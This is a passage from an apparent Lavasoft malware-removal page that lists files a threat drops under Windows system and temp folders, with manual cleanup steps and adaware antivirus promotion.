    %WinDir%\WaO\flist.bin (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\miaofuk.txt (4545 bytes)
    %System%\bc.txt (88388 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bwsostq.txt (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tfijpnx.txt (601 bytes)
    %System%\ndis500.exe (255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\waoiuoq.txt (10177 bytes)
    %WinDir%\WaO\sys32\urlnav.dll (83 bytes)
    %System%\lhc.txt (9476 bytes)
    %System%\ndsqp.exe (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tzejock.txt (7345 bytes)
    %System%\safe.txt (122772 bytes)
    %System%\lhc.dat (53 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ulmxeae.txt (13 bytes)
    %WinDir%\WaO\exec\tray.txt (188360 bytes)
    %System%\drivers\HideSys.sys (15 bytes)
    %WinDir%\WaO\sys32\urlnav.txt (14076 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now